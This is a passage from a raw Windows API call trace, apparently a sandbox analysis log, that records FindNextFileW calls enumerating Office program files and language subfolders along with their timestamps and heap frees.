lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf073ddf4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ToolIcons", cAlternateFileName="TOOLIC~1")) returned 0 [0306.739] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0306.739] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0306.739] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdd36584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdf403dbb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf58154c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf370c0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="GROOVE.EXE", cAlternateFileName="")) returned 1 [0306.777] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.777] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="EUROTOOL.XLAM", cAlternateFileName="EUROTO~1.XLA")) returned 1 [0306.802] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0306.802] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41a796b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf41a796b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="SOLVER", cAlternateFileName="")) returned 0 [0306.802] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0306.802] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0306.802] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1b27715c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b27715c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="LogoImages", cAlternateFileName="LOGOIM~1")) returned 1 [0307.774] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0307.774] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7c11d2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdd0d91a6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xde4d0d64, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1979a48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="lync.exe", cAlternateFileName="")) returned 1 [0308.224] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0308.224] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x38b7c4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14c48, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="MeetingJoinAxOC.dll", cAlternateFileName="MEETIN~1.DLL")) returned 1 [0308.374] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0308.374] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bg", cAlternateFileName="")) returned 1 [0308.378] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0308.378] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca", cAlternateFileName="")) returned 1 [0308.380] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0308.380] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf803d796, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs", cAlternateFileName="")) returned 1 [0308.382] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.382] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da", cAlternateFileName="")) returned 1 [0308.389] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.389] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6224b6a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6224b6a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6224b6a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de", cAlternateFileName="")) returned 1 [0308.391] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.391] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff0bc27, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff31e88, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="el", cAlternateFileName="")) returned 1 [0308.393] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.393] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5a3de35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5a3de35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="en-us", cAlternateFileName="")) returned 1 [0308.394] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.394] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcb7dd00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es", cAlternateFileName="")) returned 1 [0308.396] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.396] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="et", cAlternateFileName="")) returned 1 [0308.398] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.398] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu", cAlternateFileName="")) returned 1 [0308.399] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.399] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fi", cAlternateFileName="")) returned 1 [0308.403] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.403] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr", cAlternateFileName="")) returned 1 [0308.405] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.405] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa178468, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa178468, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa178468, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gl", cAlternateFileName="")) returned 1 [0308.406] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.406] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf618b1a4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf618b1a4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he", cAlternateFileName="")) returned 1 [0308.408] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.408] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hi", cAlternateFileName="")) returned 1 [0308.410] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.410] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf480feb5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr", cAlternateFileName="")) returned 1 [0308.411] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.411] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu", cAlternateFileName="")) returned 1 [0308.421] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.421] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x63a229e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="id", cAlternateFileName="")) returned 1 [0308.628] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.628] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ae17b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ae17b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ae17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10fcc8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ipcsecproc.dll", cAlternateFileName="IPCSEC~1.DLL")) returned 1 [0308.692] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.692] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja", cAlternateFileName="")) returned 1 [0308.710] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.710] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6781ff8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6781ff8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kk", cAlternateFileName="")) returned 1 [0308.712] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0308.712] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f9c329, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5f9c329, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5f9c329, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko", cAlternateFileName="")) returned 1 [0308.714] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.714] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1bce2f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bce2f5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bf45a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lt", cAlternateFileName="")) returned 1 [0308.714] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.714] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf13037fa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf13037fa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf13037fa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lv", cAlternateFileName="")) returned 1 [0308.716] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.716] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc21a8ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc21a8ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc21a8ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ms", cAlternateFileName="")) returned 1 [0308.718] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.718] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0dcc568, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0dcc568, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b3ce622, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f9f00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msipc.dll", cAlternateFileName="")) returned 1 [0308.720] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.720] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xffe01c35, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffe01c35, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffe01c35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="no", cAlternateFileName="")) returned 1 [0308.721] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.721] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68ff786, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x68ff786, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69259a9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pl", cAlternateFileName="")) returned 1 [0308.722] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.722] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc2b31ff, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2b31ff, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2b31ff, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt", cAlternateFileName="")) returned 1 [0308.723] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.723] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0308.725] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.725] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4903b8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4903b8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4903b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ro", cAlternateFileName="")) returned 1 [0308.726] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.726] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x86a6c5d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x86a6c5d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x86a6c5d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ru", cAlternateFileName="")) returned 1 [0308.728] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0308.728] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a8250, 